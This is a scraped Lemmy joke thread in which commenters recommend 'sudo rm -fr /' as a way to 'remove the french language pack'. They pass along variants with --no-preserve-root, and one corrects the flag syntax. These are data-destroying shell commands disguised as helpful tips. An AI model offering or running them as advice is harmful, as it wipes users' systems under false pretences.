jonathanvmv8f@lemm.ee to Lemmy Shitpost@lemmy.world · 1 month agoNew social experimentlemm.eeexternal-linkmessage-square6fedilinkarrow-up10arrow-down10
arrow-up10arrow-down1external-linkNew social experimentlemm.eejonathanvmv8f@lemm.ee to Lemmy Shitpost@lemmy.world · 1 month agomessage-square6fedilink
minus-squaregandalf_der_12te@discuss.tchncs.delinkfedilinkarrow-up1·1 month agoalways remove the french language pack sudo rm -fr /
minus-squarecows_are_underrated@feddit.orglinkfedilinkarrow-up1·1 month agoMake sure to also completely delete the word roots. sudo rm -fr /* --no-preserve-root
minus-squarecoldsideofyourpillow@lemmy.cafelinkfedilinkEnglisharrow-up2·3 days agoYou only need the --no-preserve-root flag when acting on /. So the correct code would be either sudo rm -fr /* or sudo rm -fr / --no-preserve-root(more appropriate for your ‘advice’)
always remove the french language pack
sudo rm -fr /
Make sure to also completely delete the word roots.
sudo rm -fr /* --no-preserve-root
You only need the
--no-preserve-root
flag when acting on/
.So the correct code would be either
sudo rm -fr /*
orsudo rm -fr / --no-preserve-root
(more appropriate for your ‘advice’)